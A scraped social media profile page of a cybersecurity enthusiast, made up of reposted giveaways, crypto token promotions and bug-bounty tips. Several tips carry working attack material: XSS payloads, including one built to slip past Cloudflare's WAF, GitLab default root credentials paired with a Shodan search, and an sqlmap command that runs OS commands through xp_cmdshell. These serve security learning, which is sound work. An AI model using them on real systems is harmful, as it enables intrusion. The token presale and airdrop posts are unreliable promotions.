itz_me_adhi's profile picture. #universal_noob
#cybersec_enthusiasist

Adarsh S R

@itz_me_adhi

#universal_noob #cybersec_enthusiasist

Adarsh S R reposted

🎉 𝗙𝗿𝗲𝗲 𝗖𝗲𝗿𝘁𝗶𝗳𝗶𝗲𝗱 𝗡𝗲𝘁𝘄𝗼𝗿𝗸 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗣𝗿𝗮𝗰𝘁𝗶𝘁𝗶𝗼𝗻𝗲𝗿 (𝗖𝗡𝗦𝗣) 𝗘𝘅𝗮𝗺 - 𝗢𝘂𝗿 𝗕𝗶𝗴𝗴𝗲𝘀𝘁 𝗚𝗶𝘃𝗲𝗮𝘄𝗮𝘆! 🎉 Community empowerment is at the core of everything we do. 🤝 For a limited time, we are offering 𝗙𝗥𝗘𝗘 access to one of our…

TheSecOpsGroup's tweet image. 🎉 𝗙𝗿𝗲𝗲 𝗖𝗲𝗿𝘁𝗶𝗳𝗶𝗲𝗱 𝗡𝗲𝘁𝘄𝗼𝗿𝗸 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗣𝗿𝗮𝗰𝘁𝗶𝘁𝗶𝗼𝗻𝗲𝗿 (𝗖𝗡𝗦𝗣) 𝗘𝘅𝗮𝗺 - 𝗢𝘂𝗿 𝗕𝗶𝗴𝗴𝗲𝘀𝘁 𝗚𝗶𝘃𝗲𝗮𝘄𝗮𝘆! 🎉
Community empowerment is at the core of everything we do. 🤝

For a limited time, we are offering 𝗙𝗥𝗘𝗘 access to one of our…

Adarsh S R reposted

🔥 𝗟𝗲𝘃𝗲𝗹 𝗨𝗽 𝗬𝗼𝘂𝗿 𝗔𝗣𝗜 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗦𝗸𝗶𝗹𝗹𝘀 𝘄𝗶𝘁𝗵 𝗖𝗲𝗿𝘁𝗶𝗳𝗶𝗲𝗱 𝗔𝗣𝗜 𝗣𝗲𝗻𝘁𝗲𝘀𝘁𝗲𝗿 (𝗖-𝗔𝗣𝗜𝗣𝗲𝗻) 𝗘𝘅𝗮𝗺! 🔥 𝘓𝘪𝘬𝘦, 𝘙𝘦𝘴𝘩𝘢𝘳𝘦 𝘢𝘯𝘥 𝘍𝘰𝘭𝘭𝘰𝘸 🎉 3 𝘭𝘶𝘤𝘬𝘺 𝘸𝘪𝘯𝘯𝘦𝘳𝘴 𝘸𝘪𝘭𝘭 𝘳𝘦𝘤𝘦𝘪𝘷𝘦 𝘍𝘙𝘌𝘌 𝘊𝘦𝘳𝘵𝘪𝘧𝘪𝘦𝘥…


Adarsh S R reposted

🚀  Exciting News ! 🚀 We're excited to introduce FREE mock exams! 📚 You can now access our mock exams for FREE for most of our pentesting exams, including the CAPen exam. No need for discount codes – you can directly give them a try! Please help us spread the word by sharing…

TheSecOpsGroup's tweet image. 🚀  Exciting News ! 🚀

We're excited to introduce FREE mock exams! 📚

You can now access our mock exams for FREE for most of our pentesting exams, including the CAPen exam. No need for discount codes – you can directly give them a try!

Please help us spread the word by sharing…

Adarsh S R reposted

FREE COURSE & CERTIFICATION GIVEAWAY We are giving away 1 x certification of "Windows API Security Professional (WASP)" To participate - Like this tweet - Retweet this tweet courses.pointersec.com/p/windows-api-… #cybersecurity #infosec #malware #windows #hacking #windowsapi

Ox4d5a's tweet image. FREE COURSE & CERTIFICATION GIVEAWAY  

We are giving away 1 x certification of "Windows API Security Professional (WASP)" 

 To participate
 - Like this tweet 
- Retweet this tweet   

courses.pointersec.com/p/windows-api-…

#cybersecurity #infosec #malware #windows #hacking #windowsapi

Adarsh S R reposted

You probably know that <Img Src=javascript:alert(1)> Doesn't work anymore (although several lists out there have it) But if you add OnError=location=src It does! brutelogic.com.br/gym.php?p05=%3… By:@BRuteLogic #bugbountytips #bugbounty


Adarsh S R reposted

You asked and we answered... Because of the interest in our merch, we've decided to run a giveaway! We're offering merch bundles to 10 lucky winners (items may vary to those shown). To enter: 🛡️ Follow us and @CysecCareers 🛡️ Retweet this tweet Worldwide. Closes Jan 5, 2024

SecBlueTeam's tweet image. You asked and we answered...

Because of the interest in our merch, we&apos;ve decided to run a giveaway! We&apos;re offering merch bundles to 10 lucky winners (items may vary to those shown). 

To enter:

🛡️ Follow us and @CysecCareers 
🛡️ Retweet this tweet

Worldwide. Closes Jan 5, 2024

Adarsh S R reposted

Tonight I am presenting at @htb_mx. I am also planning to give away a bunch of stickers/swag from @PentesterLab, @RedTeamVillage_ and @SaltySecurity. Looking forward to sharing with everyone!

kuzushi's tweet image. Tonight I am presenting at @htb_mx.  I am also planning to give away a bunch of stickers/swag from @PentesterLab, @RedTeamVillage_ and @SaltySecurity.  Looking forward to sharing with everyone!
kuzushi's tweet image. Tonight I am presenting at @htb_mx.  I am also planning to give away a bunch of stickers/swag from @PentesterLab, @RedTeamVillage_ and @SaltySecurity.  Looking forward to sharing with everyone!
kuzushi's tweet image. Tonight I am presenting at @htb_mx.  I am also planning to give away a bunch of stickers/swag from @PentesterLab, @RedTeamVillage_ and @SaltySecurity.  Looking forward to sharing with everyone!

THANKS @PentesterLab for this awsome swag 🍃

itz_me_adhi's tweet image. THANKS @PentesterLab  for this awsome swag 🍃

Adarsh S R reposted

After getting lot of positive feedback by conducting "DISHA MARK I" We InitCrew are back with "DISHA MARK II" DISHA MARK II -Creating Cybersecurity professionals through a modernized, immersive, and interactive training program.

in1tcr3w's tweet image. After getting lot of positive feedback by conducting &quot;DISHA MARK I&quot; We InitCrew are back with &quot;DISHA MARK II&quot;

DISHA MARK  II -Creating Cybersecurity professionals through a modernized, immersive, and interactive training program.

Adarsh S R reposted

✅ Awesome #Android Application #Pentesting Mind Map (Checklist) by @harshbothra_ * Tools * Test Cases * Guides & Reference #cybersecurity #infosec #hacking #bugbounty #bugbountytips #Python #Linux

payloadartist's tweet image. ✅ Awesome #Android Application #Pentesting Mind Map (Checklist) by @harshbothra_ 

* Tools
* Test Cases
* Guides &amp;amp; Reference

#cybersecurity #infosec #hacking #bugbounty #bugbountytips #Python #Linux

Adarsh S R reposted

@itz_me_adhi 💌 Thank YOU for bringing the magic to Dreamforce. ICYMI: Find all the highlights on Salesforce+. Anytime, anywhere. Reply #stop to opt-out.


Adarsh S R reposted

I've been working on my #osint tool collection for 15 months. It includes tools from my tweets from April 2021. Today I added 41 new tools from last month's tweets. Now: 131 sections and subsections 1000+ tools (almost all links with descriptions) github.com/cipher387/osin… RT 🙏


Adarsh S R reposted

CVE-2022-30075: Authenticated Remote Code Execution in Tp-Link Routers. PoC github.com/aaronsvk/CVE-2…

cyber_advising's tweet image. CVE-2022-30075: Authenticated Remote Code Execution in Tp-Link Routers.

PoC
github.com/aaronsvk/CVE-2…

Adarsh S R reposted

👻 The Phantom Project. 🚀 Presale starts on 31th March 17 / 5pm UTC on our website / dApp. Join: t.me/thephantomproj… 🚀 Presale price: 0,008$ 🚀 Listing price: 0,01$ 🚀 Presale: 31/03/22 🚀 Launch: 03/04/22 You are buying the presale 20% discounted + without any fees.


Adarsh S R reposted

Scanning Log4j RCE - CVE-2021-44228 using Nuclei Template shared by @_melbadry9 @daffainfo @DhiyaneshDK Template - github.com/projectdiscove… Reference - github.com/advisories/GHS… #hackwithautomation #bugbounty #pentest #security

pdnuclei's tweet image. Scanning Log4j RCE - CVE-2021-44228 using Nuclei Template shared by @_melbadry9 @daffainfo @DhiyaneshDK 

Template - github.com/projectdiscove…

Reference - github.com/advisories/GHS…

#hackwithautomation #bugbounty #pentest #security

Adarsh S R reposted

#bugbountytips If you found a GitLab instance, try to login as root/admin with those credentials:- Username: root & pass: 5iveL!fe Username: admin & Pass: 5iveL!fe You can find it with #shodan : org:"Target" http.title:"GitLab" #CyberSecurity #BugBounty

0xmahmoudJo0's tweet image. #bugbountytips 

If you found a GitLab instance, try to login as root/admin with those credentials:-

Username: root &amp;amp; pass: 5iveL!fe
Username: admin &amp;amp; Pass: 5iveL!fe

You can find it with #shodan :

org:&quot;Target&quot; http.title:&quot;GitLab&quot;

#CyberSecurity #BugBounty

Adarsh S R reposted

One liner to mass scan for CookieMonster issues echo "host" | nuclei -t cookie-extractor.yaml | cut -d "=" -f 2 | cut -d ";" -f 1 > cookies && for cookie in $(cat cookies); do ./cookiemonster -cookie $cookie; done #bugbountytips

galnagli's tweet image. One liner to mass scan for CookieMonster issues

echo &quot;host&quot; | nuclei -t cookie-extractor.yaml  | cut -d &quot;=&quot; -f 2 | cut -d &quot;;&quot; -f 1 &amp;gt; cookies &amp;amp;&amp;amp; for cookie in $(cat cookies); do ./cookiemonster -cookie $cookie; done

#bugbountytips

Excited to share a small thing I've been working on: fast tooling for detecting misconfigured session implementations in web apps. CookieMonster rapidly finds misconfigured secret keys in applications using Laravel, Flask, JWTs, and more! ian.sh/cookiemonster



Adarsh S R reposted

Cloudflare bypassed !!! "-alert(0)-" : blocked "-top['al\x65rt']('sailay')-" : passed #bountytips

404death's tweet image. Cloudflare bypassed !!!

&quot;-alert(0)-&quot;   :  blocked
&quot;-top[&apos;al\x65rt&apos;](&apos;sailay&apos;)-&quot;   : passed 

#bountytips
404death's tweet image. Cloudflare bypassed !!!

&quot;-alert(0)-&quot;   :  blocked
&quot;-top[&apos;al\x65rt&apos;](&apos;sailay&apos;)-&quot;   : passed 

#bountytips

Adarsh S R reposted

P1 X 2 in One SQL Injection RCE Due xp_cmdshell was enabled sqlmap -r request.txt --force-ssl -p pramater --level 5 --risk 2 -dbms="Microsoft SQL Server" --os-cmd="ping your.burpcollaborator.net" @GodfatherOrwa thanks for this one #bugbounty


Adarsh S R reposted

Our #airdrop program is now live to reward our early adopters! 50 $SWU token can be won for each participant with the link below 👇 t.me/SWUAirdropBot Follow all the tasks to be eligible & you will receive the airdrop after the listing 😁


Loading...

Something went wrong.


Something went wrong.